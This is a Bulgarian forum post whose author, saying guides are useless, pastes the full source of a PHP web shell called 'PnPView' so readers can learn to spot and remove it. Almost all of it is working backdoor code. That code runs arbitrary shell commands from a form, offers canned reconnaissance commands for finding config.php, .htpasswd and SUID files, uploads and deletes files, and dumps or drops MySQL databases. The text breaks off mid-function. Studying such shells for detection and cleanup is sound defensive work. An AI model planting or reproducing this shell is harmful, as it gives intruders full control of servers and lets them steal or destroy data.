Е ето да видиме аджеба какво е ?
Гледам некви гайдове, за мен нямат смисал.
Е нека да видим какво представлява шела.
Според мен много по добре ще разберете как да го махнете,
като го видите на живо целия код
Гледам некви гайдове, за мен нямат смисал.
Е нека да видим какво представлява шела.
Според мен много по добре ще разберете как да го махнете,
като го видите на живо целия код
Code:
<?
@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
error_reporting(E_ALL & ~E_NOTICE);
$ver= "View";
$fast_commands = "
Show open ports (PnP) netstat -an | grep LISTEN | grep tcp
last root (PnP) last root
last (all users) (PnP) last all
Find all config.php in / (PnP) find / -type f -name config.php
Find all config.php in . (PnP) find . -type f -name config.php
Find all admin.php in / (PnP) find / -type f -name admin.php
Find all admin.php in . (PnP) find . -type f -name admin.php
Find all .htpasswd in / (PnP) find / -type f -name .htpasswd
Find all .htpasswd in . (PnP) find . -type f -name .htpasswd
Find all writable dirs/files in / (PnP) find / -perm -2 -ls
Find all writable dirs/files in . (PnP) find . -perm -2 -ls
Find all suid files in / (PnP) find / -type f -perm -04000 -ls
Find all suid files in . (PnP) find . -type f -perm -04000 -ls
Find all sgid files in / (PnP) find / -type f -perm -02000 -ls
Find all sgid files in . (PnP) find . -type f -perm -02000 -ls
Find all .fetchmailrc files in / (PnP) find / -type f -name .fetchmailrc
Find all .fetchmailrc files in . (PnP) find . -type f -name .fetchmailrc
OS Version? (PnP) sysctl -a | grep version
Kernel version? (PnP) cat /proc/version
cat syslog.conf (PnP) cat /etc/syslog.conf
Cat - Message of the day (PnP) cat /etc/motd
Cat hosts (PnP) cat /etc/hosts
Distrib name (PnP) cat /etc/issue.net
Distrib name (2) (PnP) cat /etc/*-realise
Display all process - wide output (PnP) ps auxw
Display all your process (PnP) ps ux
Interfaces (PnP) ifconfig
CPU? (PnP) cat /proc/cpuinfo
RAM (PnP) free -m
HDD space (PnP) df -h
List of Attributes (PnP) lsattr -a
Mount options (PnP) cat /etc/fstab
Is cURL iPnPalled? (PnP) which curl
Is wGET iPnPalled? (PnP) which wget
Is lynx iPnPalled? (PnP) which lynx
Is links iPnPalled? (PnP) which links
Is fetch iPnPalled? (PnP) which fetch
Is GET iPnPalled? (PnP) which GET
Is perl iPnPalled? (PnP) which perl
Where is apache (PnP) whereis apache
Where is perl (PnP) whereis perl
locate proftpd.conf (PnP) locate proftpd.conf
locate httpd.conf (PnP) locate httpd.conf
locate my.conf (PnP) locate my.conf
locate psybnc.conf (PnP) locate psybnc.conf
";
$fast_commands_win = "
OS Version (PnP) ver
Tasklist (PnP) tasklist
Attributes in . (PnP) attrib
Show open ports (PnP) netstat -an
";
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION['PnP']) or $_SESSION['PnP']!=$password){
die("
<title>$ver</title>
<center>
<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
<form method=post>
Password:<br>
<input type=password name=pass size=30 tabindex=1>
</form>
<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
<b>Your ip:</b> ".$ip."
</td></tr></table>
");}
}
$d=$_GET['d'];
function adds($editf){
#if(get_magic_quotes_gpc()==0){
$editf=addslashes($editf);
#}
return $editf;
}
function adds2($editf){
if(get_magic_quotes_gpc()==0){
$editf=addslashes($editf);
}
return $editf;
}
$f = "PnP_sql.txt";
$f_d = $_GET['f_d'];
if($_GET['download']){
$download=$_GET['download'];
header("Content-disposition: attachment; filename=\"$download\";");
readfile("$d/$download");
exit;}
if($_GET['dump_download']){
header("Content-disposition: attachment; filename=\"$f\";");
header("Content-length: ".filesize($f_d."/".$f));
header("Expires: 0");
readfile($f_d."/".$f);
if(is_writable($f_d."/".$f)){
unlink($f_d."/".$f);
}
die;
}
$images=array(".gif",".jpg",".png",".bmp",".jpeg");
$whereme=getcwd();
@$d=@$_GET['d'];
$php_self=@$_SERVER['PHP_SELF'];
if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
if(!isset($d)){$d=$whereme;}
$d=str_replace("\\","/",$d);
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
if(@$_GET['img']=="1"){
@$e=$_GET['e'];
header("Content-type: image/gif");
readfile("$d/$e");
}
print "<title>$ver</title>
<style>
BODY, TD, TR {
text-decoration: none;
font-family: Verdana;
font-size: 8pt;
SCROLLBAR-FACE-COLOR: #363d4e;
SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
SCROLLBAR-SHADOW-COLOR: #363d4e;
SCROLLBAR-ARROW-COLOR: #363d4e;
SCROLLBAR-TRACK-COLOR: #91AAFF
}
input, textarea, select {
font-family: Verdana;
font-size: 10px;
color: black;
background-color: white;
border: solid 1px;
border-color: black
}
UNKNOWN {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:link {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:hover {
COLOR: #FF0C0B;
TEXT-DECORATION: none
}
A:active {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:visited {
TEXT-DECORATION: none
}
</style>
<script>
function ShowOrHide(d1, d2) {
if (d1 != '') DoDiv(d1);
if (d2 != '') DoDiv(d2);}
function DoDiv(id) {
var item = null;
if (document.getElementById) {
item = document.getElementById(id);
} else if (document.all){
item = document.all[id];
} else if (document.layers){
item = document.layers[id];}
if (!item) {}
else if (item.style) {
if (item.style.display == \"none\"){ item.style.display = \"\"; }
else {item.style.display = \"none\"; }
}else{ item.visibility = \"show\"; }}
function cwd(text){
document.sh311Form.sh3.value+=\" \"+ text;
document.sh311Form.sh3.focus();
}
</script>
";
print "<body vlink=#0006DE>
<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
<tr><td><font face=wingdings size=2>0</font>";
$expl=explode("/",$d);
$coun=count($expl);
if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
else{
echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
for($i=1; $i<$coun; $i++){
@$xx.=$expl[$i]."/";
$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
$sls=str_replace("//","/",$sls);
$sls=str_replace("/'></a>/","/'></a>",$sls);
print $sls;
}
if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
echo "</td></tr>";
if($os=="unix"){ echo "
<tr><td><b>id:</b> ".@exec('id')."</td></tr>
<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
[<a href='$php_self'>Home</a>]
[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
[<a href='$php_self?d=$d&t=upload'>Upload</a>]
[<a href='$php_self?t=tools'>Tools</a>]
[<a href='$php_self?p=info'>PHPinfo</a>]
[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
[<a href='$php_self?p=sql'>SQL</a>]
[<a href='$php_self?p=selfremover'>Self Remover</a>]
</td></tr>
";
if($os=="win"){ echo "
<tr><td bgcolor=white>
<center><font face=wingdings size=2><</font>
<a href='$php_self?d=a:/'>A</a>
<a href='$php_self?d=b:/'>B</a>
<a href='$php_self?d=c:/'>C</a>
<a href='$php_self?d=d:/'>D</a>
<a href='$php_self?d=e:/'>E</a>
<a href='$php_self?d=f:/'>F</a>
<a href='$php_self?d=g:/'>G</a>
<a href='$php_self?d=h:/'>H</a>
<a href='$php_self?d=i:/'>I</a>
<a href='$php_self?d=j:/'>J</a>
<a href='$php_self?d=k:/'>K</a>
<a href='$php_self?d=l:/'>L</a>
<a href='$php_self?d=m:/'>M</a>
<a href='$php_self?d=n:/'>N</a>
<a href='$php_self?d=o:/'>O</a>
<a href='$php_self?d=p:/'>P</a>
<a href='$php_self?d=q:/'>Q</a>
<a href='$php_self?d=r:/'>R</a>
<a href='$php_self?d=s:/'>S</a>
<a href='$php_self?d=t:/'>T</a>
<a href='$php_self?d=u:/'>U</a>
<a href='$php_self?d=v:/'>V</a>
<a href='$php_self?d=w:/'>W</a>
<a href='$php_self?d=x:/'>X</a>
<a href='$php_self?d=y:/'>Y</a>
<a href='$php_self?d=z:/'>Z</a>
</td></tr>";}else{echo "<tr><td> </td></tr>";}
print "<tr><td>
:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
if($os=="unix"){
print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
}
print "</td></tr>";
if($_GET['p']=="ftp"){
print "<tr><td>";
print "</td></tr></table>";
print $copyr;
exit;
}
if(@$_GET['p']=="sql"){
print "<tr><td>";
$f_d = $_GET['f_d'];
if(!isset($f_d)){$f_d=".";}
if($f_d==""){$f_d=".";}
$php_self=$_SERVER['PHP_SELF'];
$delete_table=$_GET['delete_table'];
$tbl=$_GET['tbl'];
$from=$_GET['from'];
$to=$_GET['to'];
$adress=$_POST['adress'];
$port=$_POST['port'];
$login=$_POST['login'];
$pass=$_POST['pass'];
$adress=$_GET['adress'];
$port=$_GET['port'];
$login=$_GET['login'];
$pass=$_GET['pass'];
$conn=$_GET['conn'];
if(!isset($adress)){$adress="localhost";}
if(!isset($login)){$login="root";}
if(!isset($pass)){$pass="";}
if(!isset($port)){$port="3306";}
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
?>
<style>
table,td{
color: black;
font-face: verdana;
font-size: 11px;
}
</style>
<font color=black face=verdana size=1>
<? if(!$conn){ ?>
<!-- table 1 -->
<table bgcolor=#D7FFA8>
<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
</table>
<!-- end of table 1 -->
<?
$conn=$_GET['conn'];
$adress=$_GET['adress'];
$port=$_GET['port'];
$login=$_GET['login'];
$pass=$_GET['pass'];
if($conn){
$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
print "<br><font color=red>[db]</font><Br>";
print "<font color=white>";
$res = mysql_list_dbs($serv);
while ($str=mysql_fetch_row($res)){
print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
$tc++;
}
$baza=$_GET['baza'];
$db=$_GET['db'];
print "<font color=red>[Total db: $tc]</font><br>";
if($baza){
print "<div align=left><font color=green>db: [$db]</div></font><br>";
$result=@mysql_list_tables($db);
while($str=@mysql_fetch_array($result)){
$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
$records=mysql_fetch_array($c);
if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
if($records[0]=="0"){
print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
}else{
print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
}
mysql_free_result($c);
$total_t++;
}
print "<br><B><font color=red>Total tables: $total_t</font></b>";
print "<pre>";
for($i=0; $i<$s4ot+10; $i++){print " ";}
print "</pre>";
}
if(isset($delete_table)){
mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
}
if(isset($_GET['delete_db'])){
mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
}
if(isset($_POST['delete_row'])){
$_POST['delete_row'] = base64_decode($_POST['delete_row']);
mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
}
$vn=$_GET['vn'];
print "</td><td valign=top>";
print "<font color=green>Database: $db => $vn</font>";
if(isset($_POST['edit_row'])){
$edit_row=base64_decode($_POST['edit_row']);
$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
print "<br><br>
<table border=0 cellpadding=1 cellspacing=1><tr>
<td><b>Row</b></td><td><b>Value</b></td></tr>";
print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
print "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
print " <input type=radio name=upd value=update checked>Update<br>
<input type=radio name=upd value=insert>Insert new<br><br>";
$i=0;
}
$delstring=base64_encode($del);
print "<input type=hidden name=delstring value=\"$delstring\">";
print "$buff</table><br>";
print "<br>";
if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
if($_POST['makeupdate']){
if($_POST['upd']=='update'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i<count($matches3[0]); $i++){
eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
}
$total_str = substr_replace($total_str,"",-1);
$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
}
if($_POST['upd']=='insert'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i<count($matches3[0]); $i++){
eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
}
$total_str = ",,".$total_str;
preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
for($i=0; $i<count($matches4[1]); $i++){
$matches4[1][0]=str_replace(",","",$matches4[1][0]);
$total_m_i .= "`".$matches4[1][$i]."`,";
$total_m_x .= "'".$matches4[2][$i]."',";
}
$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
}
}
}
if($_GET['ins_new_line']){
$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
Insert new line in <b>$tbl</b> table</b><Br><br>";
print "<table>";
while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
foreach ($new_line as $key =>$next) {
$buff .= "$next ";
}
$expl=explode(" ",$buff);
$buff2 .= $expl[0]." ";
print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
</td></tr>";
unset($buff);
}
print "</table>
<center><input type=submit value=Insert name=mk_ins></form></center>";
if($_POST['mk_ins']){
preg_match_all("/(.*?)\s/i",$buff2,$matches3);
for($i=0; $i<count($matches3[0]); $i++){
eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
}
$total_str = ",,".$total_str;
preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
for($i=0; $i<count($matches4[1]); $i++){
$matches4[1][0]=str_replace(",","",$matches4[1][0]);
$total_m_i .= "`".$matches4[1][$i]."`,";
$total_m_x .= "'".$matches4[2][$i]."',";
}
$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
}
}
if(isset($_GET['rename_table'])){
$rename_table=$_GET['rename_table'];
print "<br><br>Rename <b>$rename_table</b> to<br><br>
<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
<input name=new_name size=30><center><br>
<input type=submit value=Rename></center>
</form>
";
if(isset($_POST['new_name'])){
mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
}
}
if($_GET['dump']){
if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
<font color=green><b>You can change temp folder for dump file in your browser!<br>
<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
Then press enter</b></font>
</font>");}
mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# PnPView.php v$ver
");
$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
$row = mysql_fetch_row($que);
fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$que = mysql_query("SELECT * FROM `$tbl`");
if(mysql_num_rows($que)>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
fwrite($fp, $sql);
}
}
fclose($fp);
print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
}
if($_GET['dump_db']){
$c=mysql_num_rows(mysql_list_tables($db));
if($c>=1){
print "<br><br> Dump database <b>$db</b>";
}else{
print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
die;
}
if(sizeof($tabs)==0){
$res = mysql_query("SHOW TABLES FROM $db");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_row($res)){
$tabs[] .= $row[0];
}
}
}
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# PnPView.php v$ver
");
foreach($tabs as $tab) {
fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
$res = mysql_query("SHOW CREATE TABLE `$tab`");
$row = mysql_fetch_row($res);
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$res = mysql_query("SELECT * FROM `$tab`");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_assoc($res)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = join("', '", $values);
$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
fwrite($fp, $sql);
}}
fwrite($fp, "\r\n\r\n\r\n");
}
fclose($fp);
print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
}
$vnutr=$_GET['vnutr'];
$tbl=$_GET['tbl'];
if($vnutr and !$_GET['ins_new_line']){
print "<table cellpadding=0 cellspacing=1><tr><td>";
mysql_select_db($db) or die(mysql_error());
$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
$cfa=mysql_fetch_array($c);
mysql_free_result($c);
print "
Total: $cfa[0]
<form>
From: <input name=from size=3 value=0>
To: <input name=to size=3 value='$cfa[0]'>
<input type=submit name=show value=Show>
<input type=hidden name=vnutr value=1>
<input type=hidden name=vn value='$vn'>
<input type=hidden name=db value='$db'>
<input type=hidden name=login value='$login'>
<input type=hidden name=pass value='$pass'>
<input type=hidden name=adress value='$adress'>
<input type=hidden name=conn value=1>
<input type=hidden name=baza value=1>
<input type=hidden name=p value=sql>
<input type=hidden name=tbl value='$tbl'>
[<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
</form></td></tr></table>";
$vn=$_GET['vn'];
$from=$_GET['from'];
$to=$_GET['to'];
$from=$_GET['from'];
$to=$_GET['to'];
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
$query = "SELECT * FROM $vn LIMIT $from,$to";
$result = mysql_query($query);
$result1= mysql_query($query);
print $del_result;
print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
for ($i=0;$i<mysql_num_fields($result);$i++){
$name=mysql_field_name($result,$i);
$type = mysql_field_type($result, $i);
$len = mysql_field_len($result, $i);
print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
}
print "</tr><pre>";
while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
foreach($mn as $key=>$inside){
$buffer1 .= "`$key`='".adds($inside)."' AND ";
$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)." </td>";
}
$buffer1 = substr($buffer1, 0, strlen($buffer1)-5);
$buffer1 = base64_encode($buffer1);
print "<td>
<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
<input type=hidden name=delete_row value='$buffer1'>
<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
<input type=hidden name=edit_row value='$buffer1'>
<input type=submit value=Edit style='border:1px;background-color:green;'>
</form>
</td>\r\n";
print $b1;
print "</tr>";
unset($b1);
unset($buffer1);
}
mysql_free_result($result);
print "</table>";
}print "</td></tr></table>";
}
print "</tr></td></table> </td></tr></table>";
print $copyr;
die;
}
if($p=="yes"){
$path=__FILE__;
@unlink($path);
$path=str_replace("\\","/",$path);
if(file_exists($path)){$hmm="NOT DELETED!!!";
print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
}else{$hmm="DELETED";}
print "<script>alert('$path $hmm');</script>";
}
if($os=="unix"){
function fastcmd(){
global $fast_commands;
$c_f=explode("\n",$fast_commands);
$c_f=count($c_f)-2;
print "
<form method=post>
Total commands: $c_f<br>
<select name=sh3>";
$c=substr_count($fast_commands," (PnP) ");
for($i=0; $i<=$c; $i++){
$expl2=explode("\r\n",$fast_commands);
$expl=explode(" (PnP) ",$expl2[$i]);
if(trim($expl[1])!=""){
print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
}
}
print "</select><br>
<input type=submit value=Exec>
</form>
";
}
}
if($os=="win"){
function fastcmd(){
global $fast_commands_win;
$c_f=explode("\n",$fast_commands_win);
$c_f=count($c_f)-2;
print "
<form method=post>
Total commands: $c_f<br>
<select name=sh3>";
$c=substr_count($fast_commands_win," (PnP) ");
for($i=0; $i<=$c; $i++){
$expl2=explode("\r\n",$fast_commands_win);
$expl=explode(" (PnP) ",$expl2[$i]);
if(trim($expl[1])!=""){
print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
}
}
print "</select><br>
<input type=submit value=Exec>
</form>
";
}
}
echo "
<tr><td>";
if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
";
chdir($d);
echo getcwd()."<br><br>
Fast cmd:<br>";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
";
if(@$_POST['sh3']){
$sh3=$_POST['sh3'];
echo "<pre>";
print `$sh3`;
echo "</pre>";
}
}
if(@$_GET['sh311']=="2"){
echo "<center>cmd<br>
pwd:
";
chdir($d);
echo getcwd()."<br><br>
Fast cmd:<br>";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
if(@$_POST['sh3']){
$sh3=$_POST['sh3'];
echo "<pre>"; print `$sh3`; echo "</pre>";}
echo $copyr;
exit;}
if(@$_GET['delfl']){
@$delfolder=$_GET['delfolder'];
